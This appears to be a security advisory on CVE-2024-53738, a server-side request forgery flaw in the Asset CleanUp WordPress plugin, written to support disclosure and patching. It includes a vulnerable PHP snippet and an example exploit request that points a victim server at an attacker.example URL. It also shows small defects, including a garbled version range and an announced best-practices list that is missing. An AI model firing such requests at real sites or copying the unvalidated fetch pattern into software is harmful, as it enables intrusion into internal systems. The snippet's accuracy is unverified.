A recently discovered vulnerability, identified as CVE-2024-53738, has been found in Gabe Livan Asset CleanUp: Page Speed Booster plugin. This vulnerability presents a Server-Side Request Forgery (SSRF) risk that affects plugin versions Cthrough 1.3.9.8. In this post, we'll discuss the details of the vulnerability and provide information on how to address this issue.

I. Vulnerability Overview

Server-Side Request Forgery (SSRF) is a web application security vulnerability that allows an attacker to perform arbitrary requests, typically targeting internal systems, on behalf of a vulnerable server. In the case of the Gabe Livan Asset CleanUp: Page Speed Booster plugin, the SSRF vulnerability exists because the plugin does not properly validate and sanitize user input, thereby enabling attackers to execute unauthorized actions.

Affected Plugin: Gabe Livan Asset CleanUp: Page Speed Booster

- Affected Versions: n/a through 1.3.9.8

II. Code Snippet

The vulnerability is present in specific parts of the plugin's code that do not properly sanitize and validate user input. Below is a snippet of the vulnerable code:

function assetcleanup_get_content(){
    if(isset($_GET['assetcleanup_get'])) {
        $url = base64_decode($_GET['assetcleanup_get']);
        $content = file_get_contents($url);
        echo $content;
    }
}

As shown in the code snippet, the plugin processes the $_GET['assetcleanup_get'] parameter without proper input validation and sanitization. It decodes the parameter using base64_decode and fetches the content of the given URL using file_get_contents. This allows an attacker to craft a malicious request that could lead to SSRF.

III. Exploit Details

An attacker could exploit the SSRF vulnerability in Gabe Livan Asset CleanUp: Page Speed Booster by sending a specially crafted request with an encoded URL. The request would force the plugin to fetch content from an attacker-controlled server and could potentially gain unauthorized access to sensitive data, internal systems, or even perform actions on behalf of the vulnerable server.

Example of a malicious request

http://victim.example/wp-admin/admin-ajax.php?action=assetcleanup_get_content&assetcleanup_get=[base64_encoded_evil_url]

By replacing [base64_encoded_evil_url] with the base64 encoding of a malicious URL (e.g., http://attacker.example/malicious_script.php), the attacker could effectively force a vulnerable server to execute requests on their behalf.

IV. Mitigation and Remediation

The vulnerability has been fixed in version 1.3.9.9 of the Gabe Livan Asset CleanUp: Page Speed Booster plugin. It is strongly recommended that users of affected plugin versions update to 1.3.9.9 or later as soon as possible.

To further protect your website from SSRF attacks and other vulnerabilities, consider the following best practices:

V. References

- CVE-2024-53738 (CVE Entry): https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53738
- Gabe Livan Asset CleanUp: Page Speed Booster plugin: https://wordpress.org/plugins/wp-asset-clean-up/
- SSRF (OWASP): https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
- Mitigation steps for SSRF vulnerabilities (OWASP): https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html

Conclusion

We've provided a detailed explanation of the SSRF vulnerability found in the Gabe Livan Asset CleanUp: Page Speed Booster plugin (CVE-2024-53738). To mitigate this vulnerability, users should update to the latest version (1.3.9.9) and follow best practices to secure their websites. Always stay up-to-date on security announcements and keep your plugins, themes, and core software updated to mitigate these types of risks.

Timeline

Published on: 11/30/2024 21:15:15 UTC